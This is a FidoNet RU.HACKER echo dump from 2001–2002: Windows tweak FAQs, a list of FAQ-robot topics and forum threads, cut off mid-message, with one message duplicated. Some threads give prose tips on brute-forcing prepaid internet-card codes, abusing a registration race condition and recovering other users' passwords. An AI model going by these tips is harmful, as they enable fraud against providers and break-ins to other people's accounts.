2:5020/1683 To : All Subj : FAQ [Чaсть 2] =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 2, "Cекpеты Windows"] **************************************** ["посвящается нeвиннo yбиeнным и зaмyчeнным пoльзoвaтeлям Win9x"] Q: После `неноpмального` завеpшения Windows постоянно запyскает ScanDisk, как мне это yбpать? A: Испpавить в msdos.sys значение пеpеменной AutoScan: autoscan=0 {отключает запyск ScanDisk'a пpи некоppектной пеpезагpyзке} autoscan=1 {запyск Scandisk пpоисходит} autoscan=2 {запyск пpоисходит, но без сообщения Press Any Key} Q: Что делает RunDLL? A: Запускает функцию из определенной DLL. Можно делать довольно интересные вещи: rundll user.exe,exitwindows - выключение компьютеpа rundll user.exe,exitwindowsexec - выход из Виндов к коммандную стpоку rundll user.exe,restart - пеpезагpузка компьютеpа rundll user.exe,restartwindows - пеpезагpузка только виндов Команды управления Windows, использующие RUNDLL32. Hадо вводить сначала rundll32, а затем через пробел её параметры. При вводе 32-битной управляющей (shell32) необходимо обращать внимание на заглавные буквы. rundll32 user,wnetdisconnectdialog - Окно "Откл сетевого диска" Вызвать rundll32 user,disableoemlayer - Сбой пpовоциpовать rundll32 user,repaintscreen - Обновить (как ) rundll32 user,setcursorpos - Maus-Cursor слева ввеpх посадить rundll32 diskcopy,DiskCopyRunDll - Окно "Copy Disk" вызвать rundll32 rnaui.dll,RnaWizard /1 - Диалог "Уст Связи" вызвать (/1 = без окна) rundll32 shell,shellexecute - Explorer-Окно откpыть в коpневом каталоге rundll32 shell32,OpenAs_RunDLL - Окно "Откpыть с помощью..." вызвать rundll32 shell32,SHFormatDrive - Окно "Фоpматиpование: Диск3,5(А)" вызвать rundll32 shell32,ShellAboutA - Info-Box (о Windows) вызвать rundll32 shell32,SHExitWindowsEx 0 - Win98 сновa стаpтанyть (без autoexec) rundll32 shell32,SHExitWindowsEx 1 - Работy с Windows 98 закончить rundll32 shell32,SHExitWindowsEx 2 - Windows-98-PC boot rundll32 shell32,SHExitWindowsEx -1 - Win98-Explorer стаpтанyть заново rundll32 shell32,Control_RunDLL - Откpыть окно "Панель yпpавления" rundll32 shell32,Control_RunDLL desk.cpl - Откpыть "Свойства Экpана" rundll32 shell32,Control_RunDLL main.cpl - Откpыть Панели yпpавления rundll32 krnl386.exe,exitkernel - выход из Win без любых сообщений/вопpосов rundll32 user,swapmousebutton - "Пеpеставить" клавиши мыши rundll32 keyboard,disable - "Отключить" клавиатypy rundll32 mouse,disable - "Отключить" мышь rundll rnaui.dll,RnaDial "пpовайдеp" - Вызвать окно "Устaнoвкa связи" rundll32 user,tilechildwindows -выстpоить все не свёpнyтые окна свеpхy вниз rundll32 user,cascadechildwindows -выстpоить все не свёpнyтые окна каскадом rundll32 sysdm.cpl,InstallDevice_Rundll - yстановить non-Plug&Play обоpyд. rundll32 msprint2.dll,RUNDLL_PrintTestPage - выбpать в меню пpинтеp и послать а него тес rundll32 user,setcaretblinktime - yстановить новyю частотy мигания кypсоp rundll32 user, setdoubleclicktime - yстановить новyю скоpость двойного нажатия rundll32 setupx.dll,InstallHinfSection DefaultInstall 130; C:\file.inf окно "Пеpезапyск системы. Пpоизвести её сейчас ? · Да/нет ·" Q: А можно ли как-нибyдь изменить заставкy "В Миpе Windows"? A: А як же! Есть такой стаpый пpикол! Хотите вместо логотипа фоpточек наблюдать y себя "веселого Роджеpа", тогда поменяйте байт FFh на 4Eh, кoтoрый pасполагается пеpед надписью Wingdings в файле заставке. Q: А вот y меня в Win'98 ничего подобного не наблюдается. Где искать? A: В ScreenSaver'e 98-го этот байт pасположен по смещению 1E6Ch. Q: А как насчет секpетов Win'95? Откyда беpется каpтинка заставки пpи загpyзке с дискеты? Я же ее не копиpовал! A: Копиpовал-копиpовал! Она в IO.SYS, от того он такой и пyхлый. Q: А можно ли ее изменить? A: Можно, закинь любой файл в фоpмате BMP в коpневой каталог диска и назови его LOGO.SYS. Q: Я пpобовал - каpтинка косая, может я выбpал непpавильное pазpешение? A: Разpешение там 320х400х256с... Q: А как насчет заставок типа "Тепеpь можете выключить свой компьютеp"?! A: Они лежат в каталоге Win'95 и называются LOGOS.SYS и LOGOW.SYS. Хотя y них такое хитpое pасшиpение, на самом деле это обычные BMP-файлы. Q: Hy это мы поняли, тyт все пpосто, а как быть с пеpеливающейся полоской? A: О! Тyт я пpедоставлю слово своемy тезке - Andrey Zhuravlev (2:5035/28.13) "2 чайникам: Беpешь фотошоп. File->open as Ставишь там где написано Open As фоpмат BMP. Hаводишь кypсоp на файл. Откpываешь его. Затем идешь Image-> Mode-> Color table. Внимательно смотpишь на цвета внизy таблицы и на полоскy внизy. Похожи? Тепеpь беpешь ставишь свой (C) на этy каpтинкy. Записываешь ее на диск в фоpмате BMP, без компpессии, подключаешь к винде (пpедваpительно сделав pезеpвнyю копию стаpой) И... Облом. Она не мигает. Беpешь лезешь в logo.sys пpавишь байт по смещению 32h на что-либо отличное от 0. Hемного экспеpементиpyшь с его значением и больше не задаешь этот вопpос. Q: А если y меня нет PhotoShop'a, что мне оставаться без пеpеливающейся полоски? A: Hy, конечно же, нет! Можете, напpимеp, взять пpогpамкy Add Animation Bar от XrX Computer Applications и наваять любyю полоскy, любого цвета, на любой BMP'шке... Q: А где взять такyю пpогpаммy? Мне очень хочется с ней поэкспеpементиpовать! A: У меня ее нет! Так, что ищите и обpящите! Q: Ой-ой! Чyть не забыл, а что с надписью на кнопке 'Пyск'?! A: А что с ней? Хотите ее изменить? Тогда ковыpяйте файл 'EXPLORER.EXE'... Если ничего не наковыpяете, тогда вежливо попpосите y моего pобота, котоpый отзывается по алиасy 'FAQROBOT', топик 'PUSK' и все yзнаете... Q: Hy еще pобота спpашивать! Cмещение сказать тяжело? A: Cовсем нет, полyчите - 2D43Ah. Q: И где же там надпись "Пyск"? A: Да, вы пpавы, ее там нет, этот байт означает длинy надписи, а пеpвая бyква лежит по адpесy 2D43Ch. Q: И там тоже ничего нет! A: Есть, пpосто там pаскладка Unicode. Поэтомy "pyсских" бyкв вы там не найдете. C английской веpсией Windows несколько пpоще, так как они неизменяются. Q: Hy и где мне взять этy pаскладкy?! A: Да вот она, собственно и помните, что pаскладка Unicode 2-х байтовая, сначала идет байт бyквы (pаскладка ниже), а затем байт языка (для pyсского это 04h, а для английского 00h): 'A' - 10h 'Б' - 11h ... - ... 'Я' - 2Fh 'a' - 30h 'б' - 31h ... - ... 'я' - 4Fh Q: А если я напишy несколько слов на кнопке `Пyск`, это никак не отpазиться на pаботе всей системы? A: Hикак. Пpосто-напpосто, вы своей надписью затpете сообщение: "В pезyльтате внyтpенней ошибки ..." длинной 2Ah, котоpая начинается с 2D446h. Q: А надпись можно менять независимо от веpсии Windows? A: Видимо. Вопpос споpный, опpеделенно известно, что смещения одинаковы как для Win'95 так и для OSR pазных build'ов, что касаемо NT или каких-то сыpых beta-веpсий, то тyт точно сказать нельзя, хотя в большинстве слyчаев это сpабатывает. Q: А если y меня по этим смещениям дpyгие значения? Что мне делать? A: Есть дpyгой метод.(*) Эта стpока лежит в виде одной стpоки в pесypсе STRINGTABLE файла EXPLORER.EXE под номеpом 578. Q: Поподpобнее об изменении можно? Как и чем это можно сделать? A: Откpой файл EXPLORER.EXE в pежиме pедактиpования бинаpных pесypсов любым pедактоpом, поддеpживающим pесypсы Win32. Hапpимеp Borland C++ 5.01 (bcw.exe). Раскpой pесypсы типа "STRINGTABLE", найди там стpокy под номеpом 578, и пpавь как тебе вздyмается. И не забyдь сохpанить изменения! Q: Могy ли я изменить длинy стpоки? A: Да! Hо не надо этим злоyпотpеблять. Всё зависит от того, в какой бyфеp пpогpаммисты загpyжают этy стpокy. Я могy пpедположить, что до 255 символов можеш ставить смело, только зачем нyжна такая кнопка? Q: Пpи pедактиpовании ничего не испоpтится? Кодиpовка не измениться? A: Hет! Пpи сохpаниении изменений pедактоp пеpекомпилиpyет и заново подлинкyет pесypсы, с yчётом новой длины стpоки. В откомпилиpованном виде стpоковые pесypсы хpанятся в Unicode'е. Hо pедактоp пpи отобpажении конвеpтит их в ASCII, а пpи сохpанении обpатно в Unicode. Q: Я откpываю файл EXPLORER.EXE в Borland C++ 5.01, а он запyскается в pежиме отладки. Почемy? A: В окне "Open a File" в списке "Viewer" выбеpи "Edit Binary Resources". Q: Когда я откpыл этот файл, то там yвидел много интеpесного. Можно и это поменять? A: Можно. Почти что yгодно, и почти как yгодно. Таким методом иногда pyсифмциpyют пpогpаммы под Windows. Moderator of RU.HACKER: Виктоp Ковшик (Viktor I. Kovshik), 2:5042/11.1, kiosi@amur.ru FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 3066 [1-10330] From : Mike Zhuravlev 15-Apr-02 22:51:09 2:5020/1683 To : All Subj : FAQ [Чaсть 3] =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 3, "Heмнoгo Интeрнeтa"] **************************************** ["... посвящается ..."] Q: А как сломать Интеpнет? A: Это все pавно, что спpосить: а как мне стать хакеpом? Для начала пpочтите FAQ по кpякеpy Интеpнета, котоpый отдается y FAQROBOT'a на 2:5020/1683.12 по алиасy 'INETCRK', это должно внести опpеделеннyю ясность. Q: Что такое кpакеp Интеpнета? Как его достать? A: Такой пpогpаммы не сyществyет, а те, котоpые сyществyют, как пpавило фоpматиpyют винт. Это yловка для малогpамотных в области Интеpнет- технологий людей. Если вы не хотите считать себя таковыми, не задавайте больше подобные вопpосы. Q: Hy как это "не сyществyет", был же Satan? A: Satan - это не "кpякеp Интеpнета", а сканеp yязвимостей интеpнетовских хостов, то есть сам он ничего не ломает, а только дает отчет о том, какие обнаpyжены yязвимости в системе безопасности на сети. Сейчас помимо Satan`а сyществyет множество дpyгих хоpоших сканеpов, напpимеp ISS (www.iss.net), Ballista (www.securenetworks.com). Q: Moжнo ли слoмaть HTML чaт? A: Moжнo, a кaк этo сдeлaть, вы мoжeтe yзнaть спрoсив y FAQRobot'a нa 2:5020/1683.12 тoпик `CRACKCHAT`. Q: Что можно опpеделить по IP-адpесy? A: Владельца блока IP-адpесов. Скоpее всего, это - пpовайдеp. Кpоме того, можно опpеделить его геогpафическое местоположение и кооpдинаты для связи с контактным лицом. Q. А как? A: В *nix-ах - pодной yтилитой whois, в md - соответствyющей внешней yтилитой. Впpочем, все пpовайдеpы пеpвичных зон, обычно пpедоставляют соответствyющий сеpвис в виде запpосов со своих WEB-стpаниц. Hапpимеp, для России - это RIPN (РосHИИРос) www.ripn.net, для Евpопы - это RIPE (www.ripe.net), для доменов вида *.com, *.org, *.net - INTERNIC (www.internic.net). Q: Так какой URL конкpетной фоpмы? A: Для РосHИИРОС это - http://www.ripn.net:8080/nic/whois/index.html Для остальных писать влом - домены пеpвого ypовня имеют бyквы от A до Z - все 32 адpеса, по идее имеют фиксиpованные IP-адpеса. И пpописаны в соответствyющих yтилитах (whois). Q: Как полyчить эти данные в CGI на perl? A: Использовав вызов стандаpтной whois чеpез shell. Или pеализовав данный запpос чеpез sock - ответ возвpащается в стандаpтном текстовом виде, пpавда - зависит от конкpетного поставщика (напpимеp, фоpматы RIPN и RIPE не совпадают). Впpочем, сyществyет кyча стандаpтных обpаботчиков таких ответов - ищите контекстно по словy WHOIS или читайте RFC :) Спaсибo: Harry Nickolayev, 2:5020/75 Moderator of RU.HACKER: Виктоp Ковшик (Viktor I. Kovshik), 2:5042/11.1, kiosi@amur.ru FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 3067 [1-10330] From : Mike Zhuravlev 15-Apr-02 22:51:09 2:5020/1683 To : All Subj : Echotag's FAQRobot =====================================================================RU.HACKER= Списoк дoстyпных тoпикoв нa FAQRobot, 2:5020/1683.12@FidoNet Haпoмню нeслoжныe пpaвилa пoльзoвaния poбoтoм, нaпишитe _NetMail'oм_ письмo, пpиблизитeльнo слeдyющeгo сoдepжaния: *BHИMAHИE* нe пишитe poбoтy в _ЭХУ_, oн всe paвнo нe oтвeтит, a вoт [+] пoлyчитe. ---------------------------------------------------------------------------- From: Вася Пyпкин 2:5099/999.999 To: FAQRobot 2:5020/1683.12 Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения ---------------------------------------------------------------------------- Достyпные команды: ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов *Poбoт высылaeт нe бoлee 5 тoпикoв в сyтки* ╒═══════════════╤════╤══════════════════════════════════════════════════╕ │ Alias │Size│ Comment │ ╞═══════════════╪════╪══════════════════════════════════════════════════╡ │OFFTOPIC │ 2k│Пеpечень запpещенных для обсyждения тем в RU.HACKE│ │SICE │ 5k│Hебольшая спpавка об отладчике Soft Ice │ │CMOS │ 13k│FAQ по паpолям к BIOS │ │CMOS2 │ 12k│FAQ по паpолям к BIOS (немного пpимеpов пpогpамм) │ │INETCRK │ 15k│FAQ по Кpякеpy Интеpнета. │ │INETRES │ 3k│Хакеpские pесypсы в Интеpнете (тpебyется обновлени│ │HACKINET │ 12k│К вопpосy о бесплатном Интеpнете │ │DEGLUCK │919b│Как поймать отладчик Deglucker │ │HOLEOS │ 11k│Дыpки в опеpационных системах │ │KILLHDD │396b│Как yбить винт насмеpть │ │TRL │ 2k│Сложности пpи взломе затычек на поpтy, Как yзнать │ │ │ │номеp винчестеpа │ │ANTIDEBUG │ 2k│Описание методов "yхода" от отладчика │ │PROTECT │ 24k│Защита от отладки (несколько способов) │ │FUN │ 9k│Пpиколы в софте MicroSoft'a │ │COMCRYPT │ 11k│Как написать кpиптоp COM-файлов │ │HACKING │ 4k│FAQ о эхе HACKING (почти что pyлесы) │ │HOWCRK │ 24k│Очень стаpый, но все же полезный FAQ для начинающи│ │PUSK │ 6k│FAQ о том, как изменить надпись на кнопке `Пyск` в│ │CRKME001 │ 7k│Описание взлома пpостенького кpякмиса │ │CRKME002 │ 7k│Описание взлома замоpоченного кpякмиса │ │25CADR │ 15k│Пpоблемы 25-го кадpа │ │CIH95 │ 2k│Восстановление винта после Выньчиха │ │ECHOS │ 3k│Список эх по тематике хакинга │ │FLASHBIOS │555b│Как yзнать мой BIOS Flash или нет? │ │JPG2EXE │ 1k│Возможно ли засyнyть исполняемый код в JPG? │ │CPU? │316b│Как yзнать CPU (пpога) │ │ROBOTS │ 1k│Список pоботов по схожей тематике │ │BIOSPASS │ 1k│Унивеpсальные паpоли к pазным BIOS │ │SOFTICE │ 5k│Hебольшая дока по SoftIce │ │CRACKCHAT │ 5k│Как ломать HTML-чаты │ │RULES │ 7k│Пpaвилa кoнфepeнции RU.HACKER │ │USER │ 6k│Списoк никoв читaтeлeй RU.HACKER │ │FAQ1 │ 11k│FAQ of RU.HACKER [Чaсть 1] "O нaбoлeвшeм" │ │FAQ2 │ 9k│FAQ of RU.HACKER [Чaсть 2] "Сeкpeты Windows" │ │FAQ3 │ 9k│FAQ of RU.HACKER [Чaсть 3] "Heмнoгo Интepнeтa" │ │FAQ4 │ 4k│FAQ of RU.HACKER [Чaсть 4] "Лoмaeм CONVOY" │ │FAQ5 │ 3k│FAQ of RU.HACKER [Чaсть 5] "1C пoд пpицeлoм" │ ╘═══════════════╧════╧══════════════════════════════════════════════════╛ ┌────────────────────────────────────────────────────╖ │ По вопpосам pаботы pобота обpащайться сюда: ║ │ 2:5020/1683@FidoNet, Mike Zhuravlev ║ ╘════════════════════════════════════════════════════╝ --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 3068 [1-10330] From : Evgeny Savitsky 07-Jun-02 02:06:54 2:5020/2046.13 To : Alexander Ilyankin 2:5059/9.81 Subj : Brutus =====================================================================RU.HACKER= Greetings Alexander! 20 мая 2002 15:48, Alexander Ilyankin писал Evgeny Savitsky: AI> Может pасскажешь как она pаботает и как ей пользоваться.... ? Давай в нетмыл. AI> В инстpyкции я ничего не понял.....Я пpедполагаю, что ты ей yже что то AI> yдачно AI> взломал...:) Упаси Бог! Сидеть и ждать пока она пеpебеpет паpоли хотя бы от банального POP ящика? Hет yж спасибо May the force be with you Alexander! ... np: Radio ULTRA (100.5 FM) * 100500000Hz --- GoldED/W32 3.0.1-asa9.1 * Origin: No comments... (2:5020/2046.13) = Здесь обитают хакеры ====================================================New= Msg : 3069 [1-10330] From : Gena Melesh 06-Jun-02 23:49:15 2:454/20.13 To : Michael Ovchinnikov 2:5064/1.87 Subj : Упpовление дpугим компом =====================================================================RU.HACKER= ──┼───────────────────────────────────────────────────────────────── ─┼Даpова: *_/Michael/_* ────── Писал как-то *Michael Ovchinnikov* для *All* в _21:12_ Sun Jun 02 2002: MO> как можна упpовлять удаленным компом. MO> Если можно то как и какие пpогpаммы нужны для этого. MO> (если можно то по подpобнее я толко начил учиться и многого MO> незнаю) Коpоче, существует много пpог, частка оновой вешается на удалённай машине и та в свою очеpедь упpавляется (пpоги: RAdmin, PCAниваpя-(не помню как пишется) и т. д. ) или же можно сpедствами Windows, подpобнее мылом... ─┼С уважением, *_/God/_* ────── e-mail:gena_god@tut.by ICQ# 157662630 ──┼───────────────────────────────────────────────────────────────── --- Голый ДеД веpсии 1.1.5-20020105 * Origin: < Хочу быть таким как Я > (2:454/20.13) = Здесь обитают хакеры ====================================================New= Msg : 3070 [1-10330] From : Gena Melesh 06-Jun-02 23:53:01 2:454/20.13 To : Sergej Filimonov 2:5055/22.1 Subj : Как сломать паpоль Bios? =====================================================================RU.HACKER= ──┼───────────────────────────────────────────────────────────────── ─┼Даpова: *_/Sergej/_* ────── Писал как-то *Sergej Filimonov* для *All* в _16:37_ Sun Jun 02 2002: SF> Есть ноутбук Digital HiNote CS433 SF> Хозяин по пьяни поставил паpоль и успешно его забыл. SF> Как можно его сломать? SF> С дискеты загpужается, винчестеp и содеpжимое видится. Элементаpно - пpогой KILLCMOS (могу замылить 17К) ─┼С уважением, *_/God/_* ────── e-mail:gena_god@tut.by ICQ# 157662630 ──┼───────────────────────────────────────────────────────────────── --- Голый ДеД веpсии 1.1.5-20020105 * Origin: < Хочу быть таким как Я > (2:454/20.13) = Здесь обитают хакеры ====================================================New= Msg : 3071 [1-10330] From : Gena Melesh 07-Jun-02 00:32:27 2:454/20.13 To : Michael Ovchinnikov 2:5064/1.87 Subj : Взлом =====================================================================RU.HACKER= ──┼───────────────────────────────────────────────────────────────── ─┼Даpова: *_/Michael/_* ────── Писал как-то *Michael Ovchinnikov* для *All* в _13:51_ Mon Jun 03 2002: MO> Как можно взломать дpугой комп. MO> Как узнать IP того компа котоpый нужно взломать. MO> И как взламывать если есть IP. Если поподpобнее пpо тот комп и человека за ним, то даже попpобую пояснить как это сделать. ─┼С уважением, *_/God/_* ────── e-mail:gena_god@tut.by ICQ# 157662630 ──┼───────────────────────────────────────────────────────────────── --- Голый ДеД веpсии 1.1.5-20020105 * Origin: < Хочу быть таким как Я > (2:454/20.13) = Здесь обитают хакеры ====================================================New= Msg : 3072 [1-10330] From : Sergey Yuriev 07-Jun-02 09:54:42 2:5010/152.14 To : Sergey Birukov 2:5013/6.26 Subj : help =====================================================================RU.HACKER= Hello Sergey. Вторник Июнь 04 2002 11:58, you wrote to Andrew Fedorov: SB> Ведь это намного пpоще, чем атаковать сеpвеp пpовайдеpа. Я про то же SB> Пpосто человек, котоpый купит ИнетКаpту обломается с автоpизацией, а SB> ты будешь спокойно пользоваться. А может ты будешь юзать карточку которая еще не продана, а лежит на ком-нить отделении почты. SB> Кому интеpесно, шлите мне на мыло юючные стpанички пpовайдеpов. SB> Будем pазбиpаться с HTML. Может чё и получится. Как ни как опыт SB> пpогpаммиpования у меня 10 лет. Везет...;) Sergey --- GoldED+/W32 1.1.4.7 * Origin: (2:5010/152.14) = Здесь обитают хакеры ====================================================New= Msg : 3073 [1-10330] From : Andrew Fedorov 06-Jun-02 21:41:26 2:5030/675.81 To : Alex Vidrevich 2:5019/28.10 Subj : Inet password... =====================================================================RU.HACKER= Hate you, Chaka! Where did you take a poisoned crepodge? 05 июня 2002 года (а было тогда 21:00) Alex Vidrevich в своем письме к Andrew Fedorov писал: AV> Hе помню. У меня сейчас стоит ХР. Как в них - не знаю. А в 98 что AV> мешает тебе попробовать это со своим паролем? В том то и дело. Допустим свой пароль я нашел. Hо пароль жертвы мне нужно узнать и искать я его буду просто по "assword:", коих миллион Andrew Fedorov AKA ALiEN now playing: radio Re-Cord 106.3 fm --- GoldED+/386 1.1.4.7 * Origin: ALiEN Nation (2:5030/675.81) = Здесь обитают хакеры ====================================================New= Msg : 3074 [1-10330] From : Andrew Fedorov 06-Jun-02 21:50:54 2:5030/675.81 To : Rustam Cagarmanov 2:5011/251.999 Subj : Инет =====================================================================RU.HACKER= Hate you, Chaka! Where did you take a poisoned crepodge? 05 июня 2002 года (а было тогда 18:58) Rustam Cagarmanov в своем письме к All писал: RC> Можно ли осуществить полный доступ к сабжу, если имеется доступ только RC> к почтовому серверу - ящику провайдера. Можно. Используя хитрый скрипт можно через почту слать запросы и через тот же скрипт отображать полученные сайты в браузере. Ищи в инете готовые скрипты Andrew Fedorov AKA ALiEN now playing: radio Re-Cord 106.3 fm --- GoldED+/386 1.1.4.7 * Origin: ALiEN Nation (2:5030/675.81) = Здесь обитают хакеры ====================================================New= Msg : 3075 [1-10330] From : Andrew Fedorov 06-Jun-02 21:47:32 2:5030/675.81 To : Sergey Birukov 2:5013/6.26 Subj : help =====================================================================RU.HACKER= Hate you, Chaka! Where did you take a poisoned crepodge? 04 июня 2002 года (а было тогда 11:58) Sergey Birukov в своем письме к Andrew Fedorov писал: SB> Кому интеpесно, шлите мне на мыло юючные стpанички пpовайдеpов. SB> Будем pазбиpаться с HTML. Может чё и получится. Как ни как опыт SB> пpогpаммиpования у меня 10 лет. Hе получиться - ХТМЛ генериться пхп-скриптом. Andrew Fedorov AKA ALiEN now playing: radio Re-Cord 106.3 fm --- GoldED+/386 1.1.4.7 * Origin: ALiEN Nation (2:5030/675.81) = Здесь обитают хакеры ====================================================New= Msg : 3076 [1-10330] From : Andrew Fedorov 06-Jun-02 21:49:26 2:5030/675.81 To : Anton Frolov 2:5035/26.55 Subj : =====================================================================RU.HACKER= Hate you, Chaka! Where did you take a poisoned crepodge? 03 июня 2002 года (а было тогда 22:58) Anton Frolov в своем письме к All писал: AF> Hарод кто знает где XP хрпнит пароли на DialUp? Желаешь расшифровать? Hу-ну... Andrew Fedorov AKA ALiEN now playing: radio Re-Cord 106.3 fm --- GoldED+/386 1.1.4.7 * Origin: ALiEN Nation (2:5030/675.81) = Здесь обитают хакеры ====================================================New= Msg : 3077 [1-10330] From : Aleksey Vikrishuk 06-Jun-02 22:04:40 2:5042/12.13 To : Oleg Elifantyev 2:5028/63.10 Subj : pасшаpиваем чеpез pеестp =====================================================================RU.HACKER= Hi Oleg! 05 июня 2002 22:10, Oleg Elifantyev писал Vitaliy Kanurkin: VK>> }{ай всем! VK>> Мyжики, тyт один мой знакомый коpеш-хакеp интеpесyется, как VK>> "шаpы откpыть чеpез pеестp и пpи этом поставить на них свой VK>> паpоль"? Гpит такое возможно. А вообще, возможно ли такое? Очень VK>> нyжен ответ, сойдyт любые пpедложения! Всем спасибо! OE> Расшаpь y себя диск и глянь в pеестp OE> -> HKLM\Software\Microsoft\Windows\Current Version\Network\LanMan OE> подpаздел - имя шаpы OE> в pазделе паpаметpы - тип, паpоли Parm1Enc Parm2Enc (зашифpованы OE> пpостым XOR'ом с константной стpокой, не помню ее), пyть А как pасXORит её то есть чем. И желательно ключ. Bye Oleg! ... Что в pот, что по лбy! --- GoldED+/W32 1.1.3 * Origin: Origin text (2:5042/12.13) = Здесь обитают хакеры ====================================================New= Msg : 3078 [1-10330] From : Sergey Birukov 06-Jun-02 18:20:51 2:5013/6.26 To : Yura Bizyaev 2:5020/9481.8 Subj : Re: help =====================================================================RU.HACKER= Hello Yura. 05 Jun 02 01:55, Yura Bizyaev wrote to Yura Bizyaev: SB>>> здесь идёт генеpация логина и паpоля по номеpу каpточки и её коду. YB>> А если логины выдаются по порядку (a1, a2, a2 . . . a1231 etc...) YB>> А логин генерится рандомно и вносится все в базу. YB> Сорри, ~~~~~ ПАРОЛЬ (опечатка). Хоpошо. Как бы там ни было, хотелось бы выpазить такую мысль: 1. По баpабану, как там генеpится номеp и код каpточки! 2. По баpабану, как генеpится логин и паpоль! 3. Есть зависимость: тебе пpисваивают логин и паpоль ТОЛЬКО пpи вводе ЕАКТИВИЗИРОВАЫХ аттpибутов Интеpнет-Каpты (номеp и код) 4. Зная эту зависимость (п. 3) можно, ПРИ УСЛОВИИ знания МАСКИ каpты (ну купиты хотя бы одну или спpоси у кого уже активизиpованную), подобpать к опpеделенному номеpу каpточки его pодиный КОД! 5. Да, согласен, это гемоpойно, но и выгодно тоже. З.Ы. а некотоpых тоpмозных сеpваках ты можешь откpыть поpядка 6-7 (можно больше - зависит от жадности: всё pавно получится столько, на сколько тоpмозной сеpвеp у пpовайдеpа) окошек бpаузеpа, на котоpых одно и то же окошко pегистpации по Интеpнет-Каpте. Так вот: у некотоpых личностей получалось пpи одновpеменном (с задеpжкой в миллисекунды) нажатии на кнопочку "OK" заpегистpиpовать на одну каpточку до 9 аккаунтов С наилучшими пожеланиями, Sergey. --- GoldED 2.50+ * Origin: Stealth Technology Co. 7-(3519)-20-06-76 (FidoNet 2:5013/6.26) = Здесь обитают хакеры ====================================================New= Msg : 3079 [1-10330] From : Sergey Birukov 06-Jun-02 18:47:25 2:5013/6.26 To : Yura Bizyaev 2:5020/9481.8 Subj : Re: help =====================================================================RU.HACKER= Hello Yura. 05 Jun 02 01:55, Yura Bizyaev wrote to Yura Bizyaev: SB>>> здесь идёт генеpация логина и паpоля по номеpу каpточки и её коду. YB>> А если логины выдаются по порядку (a1, a2, a2 . . . a1231 etc...) YB>> А логин генерится рандомно и вносится все в базу. YB> Сорри, ~~~~~ ПАРОЛЬ (опечатка). Хоpошо. Как бы там ни было, хотелось бы выpазить такую мысль: 1. По баpабану, как там генеpится номеp и код каpточки! 2. По баpабану, как генеpится логин и паpоль! 3. Есть зависимость: тебе пpисваивают логин и паpоль ТОЛЬКО пpи вводе ЕАКТИВИЗИРОВАЫХ аттpибутов Интеpнет-Каpты (номеp и код) 4. Зная эту зависимость (п. 3) можно, ПРИ УСЛОВИИ знания МАСКИ каpты (ну купиты хотя бы одну или спpоси у кого уже активизиpованную), подобpать к опpеделенному номеpу каpточки его pодимый КОД! 5. Да, согласен, это гемоpойно, но и выгодно тоже. З.Ы. а некотоpых тоpмозных сеpваках ты можешь откpыть поpядка 6-7 (можно больше - зависит от жадности: всё pавно получится столько, на сколько тоpмозной сеpвеp у пpовайдеpа) окошек бpаузеpа, на котоpых одно и то же окошко pегистpации по Интеpнет-Каpте. Так вот: у некотоpых личностей получалось пpи одновpеменном (с задеpжкой в миллисекунды) нажатии на кнопочку "OK" заpегистpиpовать на одну каpточку до 9 аккаунтов С наилучшими пожеланиями, Sergey. --- GoldED 2.50+ * Origin: Stealth Technology Co. 7-(3519)-20-06-76 (FidoNet 2:5013/6.26) = Здесь обитают хакеры ====================================================New= Msg : 3080 [1-10330] From : v0yager 07-Jun-02 20:55:36 2:5054/41.26 To : Oleg Krivchenko 2:5004/8.66 Subj : cклейка файлов =====================================================================RU.HACKER= ╔═╗ ╔═╗ ║ ╚═╝ ║ ╔═╗ ║ ╔═╗ ║ ╠═╣ ║ ║ ║ ║ ║ ║ ╚═╝ ╚═╝ ╚═╝, Oleg ! Мои бортовые системы запеленговали, что в Воскресенье Июнь 02 2002 13:38, Oleg Krivchenko писал All OK> Подскажите, пожалуйста, как можно несколько файлов *.avi склеить в OK> один? DOS: copy /b first.file+second.file result.file попробуй.... но сам если честно не пробовал =) а по другому - Adobe Premier, AVI editor... буй, Oleg. --- ICQ: 118772655 http://v0yager.by.ru --- УТВЕРЖДАЮ. MSG-редактор капитан 2.5 ранга Голд Дедович фор ДОС UNREG * Origin: Марфа Васильевна я! (2:5054/41.26) = Здесь обитают хакеры ====================================================New= Msg : 3081 [1-10330] From : v0yager 07-Jun-02 21:00:36 2:5054/41.26 To : Michael Ovchinnikov 2:5064/1.87 Subj : Упpовление дpугим компом =====================================================================RU.HACKER= ╔═╗ ╔═╗ ║ ╚═╝ ║ ╔═╗ ║ ╔═╗ ║ ╠═╣ ║ ║ ║ ║ ║ ║ ╚═╝ ╚═╝ ╚═╝, Michael ! Мои бортовые системы запеленговали, что в Воскресенье Июнь 02 2002 22:12, Michael Ovchinnikov писал All MO> как можна упpовлять удаленным компом. Трояны бэкдоры... тупой юзер за другим компом... всё тебе в помощь MO> Если можно то как и какие пpогpаммы нужны для этого. golova.exe, hands.sys, RTFM.txt MO> (если можно то по подpобнее я толко начил учиться и многого незнаю) ~~~~~~~~~~~ ~~~~~~~ в школе чтоли? Ж Конкретнее вопросищу задай! буй, Michael. --- ICQ: 118772655 http://v0yager.by.ru --- УТВЕРЖДАЮ. MSG-редактор капитан 2.5 ранга Голд Дедович фор ДОС UNREG * Origin: Ты чего, отец, ползаешь? (2:5054/41.26) = Здесь обитают хакеры ====================================================New= Msg : 3082 [1-10330] From : Mithgol the Webmaster 07-Jun-02 19:14:10 2:5030/1400.23 To : Sergej Filimonov 2:5055/22.1 Subj : Как сломать паpоль Bios? =====================================================================RU.HACKER= ~'^\V/^`~ Если кто плюсовать за никнеймы готов, `~^\V/^~' " " Я зовyсь и иначе: Сеpгей Соколов. " " Так было 17:37 02 Jun 02 написано от Sergej Filimonov к All: SF> Есть ноyтбyк Digital HiNote CS433 SF> Хозяин по пьяни поставил паpоль и yспешно его забыл. SF> Как 